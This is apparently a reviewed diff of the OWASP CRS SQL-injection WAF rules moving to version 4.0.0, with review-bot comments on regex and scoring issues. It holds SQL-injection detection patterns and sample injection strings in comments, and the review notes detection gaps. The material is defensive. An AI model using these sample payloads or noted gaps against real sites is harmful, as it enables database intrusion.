REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b0x[a-f\d]{3,})" \ "id:942450,\ phase:2,\ @@ -1226,10 +1425,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # 
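Review bot: The new explanatory comment for 942450 says `(?i:\b0x[a-f\d]{3,}) will match any 3 or more hex bytes after "0x"`, but `{3,}` counts hex digits (nibbles), not bytes — `0xf00` is three digits, one and a half bytes. Reword to `# (?i:\b0x[a-f\d]{3,}) matches "0x" followed by three or more hex digits (e.g. 0xf00, 0xf00d), i.e. a hex literal long enough to be a deliberate encoding rather than a short id.` Moving 942440's `setvar` scoring into the chained rule looks right: as I read ModSecurity chain semantics, non-disruptive actions on the first rule run as soon as it matches, so a JWT-only match would otherwise still have added to the anomaly score before the chain could veto it — worth one sentence in the 942440 comment.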
@@ -1259,7 +1458,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 # ('if'). That rule runs in paranoia level 3 or higher since it is prone to
 # false positives in natural text.
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:`((?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+\/]{4})+(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?)`)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:`(?:(?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)`)" \
 "id:942510,\
 phase:2,\
 block,\
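Review bot: Turning the outer `(...)` of 942510 into `(?:...)` changes the capture numbering: `TX.1` used to hold the content between the backticks and now holds nothing, so if the rule's `logdata` or any follow-up rule references `%{TX.1}` (the action list is outside this hunk) it will come out empty after this change. Please confirm the rule uses `%{TX.0}` like its neighbours, or keep the group capturing.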
@@ -1275,16 +1474,205 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# Regular expression generated from regex-assembly/942520.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942520 # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\v]*?(?:(?:is[\s\v]+not|not[\s\v]+(?:like|glob|(?:betwee|i)n|null|regexp|match)|mod|div|sounds[\s\v]+like)\b|[%-&\*-\+\-/<->\^\|])" \ + "id:942520,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects basic SQL authentication bypass attempts 4.0/4',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# Complementary rule to PL2 942520 that block and/or-based bypasses. 
+# It blocks data with odd number of quotes and then (and|or). +# +# The rule uses the expression ^b*a*(b*a*b*a*)* to odd number of a's. It's not +# vulnerable to ReDos as it executes linearly many steps compared to input size. +# +# Regular expression generated from regex-assembly/942521.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942521 +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)^(?:[^']*?(?:'[^']*?'[^']*?)*?'|[^\"]*?(?:\"[^\"]*?\"[^\"]*?)*?\"|[^`]*?(?:`[^`]*?`[^`]*?)*?`)[\s\v]*([0-9A-Z_a-z]+)\b" \ + "id:942521,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects basic SQL authentication bypass attempts 4.1/4',\ + logdata:'Matched Data: %{TX.0} found within %{TX.942521_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.942521_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "@rx ^(?:and|or)$" \ + "t:none,\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# Complementary rule to PL2 942521 that block escaped quotes followed by (and|or) +# +SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b" \ + "id:942522,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects basic SQL authentication bypass attempts 4.1/4',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + 
tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# This is a sibling of rule 942100 that adds checking of the path. +# +# REQUEST_BASENAME provides the last url segment (slash excluded). +# This segment is the most likely to be used for injections. Stripping out +# the slash permits libinjection to do not consider it as a payload starting +# with not unary arithmetical operators (not a valid SQL command, e.g. +# '/9 union all'). The latter would lead to do not detect malicious payloads. +# +# REQUEST_FILENAME matches SQLi payloads inside (or across) other segments +# of the path. Here, libinjection will detect a true positive only if +# the url leading slash is considered as part of a comment block or part +# of a string (with a quote or double quote after it). In these circumstances, +# previous slashes do not affect libinjection result, making it able to detect +# some SQLi inside the path. +# +SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \ + "id:942101,\ + phase:1,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,\ + msg:'SQL Injection Attack Detected via libinjection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ SQL Function Names ]=- +# +# This rule is a stricter sibling of 942151. +# This rule 942152 checks for the same regex in request headers referer and user-agent. 
+# +# Regular expression generated from regex-assembly/942152.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942152 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo
)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[1-2]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \ + "id:942152,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:lowercase,\ + msg:'SQL Injection Attack: SQL function name detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# This rule is a stricter sibling of 942320. +# It checks for the same regex in request headers referer and user-agent. +# +# Regular expression generated from regex-assembly/942321.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942321 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\v]+(?:function|procedure)[\s\v]*?[0-9A-Z_a-z]+[\s\v]*?\([\s\v]*?\)[\s\v]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\s\v]*?[0-9A-Z_a-z]+|iv[\s\v]*?\([\+\-]*[\s\v\.0-9]+,[\+\-]*[\s\v\.0-9]+\))|exec[\s\v]*?\([\s\v]*?@|(?:lo_(?:impor|ge)t|procedure[\s\v]+analyse)[\s\v]*?\(|;[\s\v]*?(?:declare|open)[\s\v]+[\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\s\v]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)" \ + "id:942321,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects MySQL and PostgreSQL stored procedure/function injections',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # 
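Review bot: The chained `SecRule TX:1 "@rx ^(?:and|or)$"` under 942521 is case-sensitive and carries only `t:none`, while the parent regex that fills `TX:1` is `(?i)` with no `t:lowercase`, so a captured keyword in upper or mixed case never reaches the scoring setvars; 942522 has the same gap, as its `@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b` has neither `(?i)` nor `t:lowercase`. Either prefix both expressions with `(?i)` or add `t:lowercase` to their transformation lists, which keeps them aligned with 942520 in this hunk, whose expression does use `(?i)`. The comment above 942521 has a grammar slip: `# Complementary rule to PL2 942520 that block and/or-based bypasses.` should read `that blocks`, and the same applies to the 942522 comment. Minor style: 942321 lists `tag:'paranoia-level/2'` before `tag:'OWASP_CRS'`, unlike every other rule in this hunk, which places it after `tag:'PCI/6.5.2'`.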
@@ -1298,7 +1686,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,skipAf # # This is a stricter sibling of rule 942250. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W+\d*?\s*?having\s*?[^\s\-]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W+\d*?\s*?\bhaving\b\s*?[^\s\-]" \ "id:942251,\ phase:2,\ block,\ @@ -1314,10 +1702,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # This rule is a stricter sibling of 942330. See that rule for a # description and overview. @@ -1338,10 +1726,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # [ SQL Injection Character Anomaly Usage ] @@ -1364,7 +1752,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){8})" \ "id:942420,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:urlDecodeUni,\ 
@@ -1378,9 +1766,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1407,9 +1795,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" 
@@ -1437,44 +1825,10 @@ SecRule ARGS "@rx \W{4}" \ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}'" - - -# -# This is a sibling of rule 942100 that adds checking of the last path segment. -# -# libinjection is more likely to fail when passing the full path. E.g. the following -# string produces a match: -# 999999.1 union select unhex(hex(version())) -- and 1=1 -# while this doesn't: -# /999999.1 union select unhex(hex(version())) -- and 1=1\. -# Therefore, we capture the last segment of the path and only match that with -# libinjection. Incidentally, the last path segment is also the most likely -# to be used for injection, other segments will most likely not be affected. -# -SecRule REQUEST_BASENAME "@detectSQLi" \ - "id:942101,\ - phase:2,\ - block,\ - capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,\ - msg:'SQL Injection Attack Detected via libinjection',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-sqli',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/152/248/66',\ - tag:'PCI/6.5.2',\ - tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'" # 
@@ -1505,7 +1859,7 @@ SecRule REQUEST_BASENAME "@detectSQLi" \ # false positives in natural text is still present but lower than this # rule. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:'((?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+\/]{4})+(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?)')" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:'(?:(?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)')" \ "id:942511,\ phase:2,\ block,\ 
@@ -1521,15 +1875,45 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# Detects '; +# ' Single quote. Used to delineate a query with an unmatched quote. +# ; Terminate a query. A prematurely terminated query creates an error. +# Explanation source: +# https://hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.htm # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# Bug Bounty example: email=admin@juice-sh.op';&password=foo +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ';" \ + "id:942530,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'SQLi query termination detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:942018,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # # @@ -1540,7 +1924,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,skipAf SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ "id:942421,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:urlDecodeUni,\ @@ -1554,9 +1938,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1583,9 +1967,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" diff --git a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf index bec71ba219..3ae7b27ec4 100644 --- a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf +++ b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf 
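Review bot: 942530's `@rx ';` fires only when the semicolon immediately follows the quote, whereas 942520, added in the same change, tolerates whitespace between tokens with `[\s\v]*?`; `'[\s\v]*;` would make the new PL3 rule consistent with that convention, and the comment block should then mention that whitespace is allowed. The comment should also say why the rule is placed at PL3 rather than lower (the two-character sequence is likely to appear in free text and code samples), as the other PL3 rules in this file document their false-positive profile. Moving the 942017/942018 skip rules below the new rule is necessary for the paranoia-level gate to cover it, so that part looks right.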
@@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # 
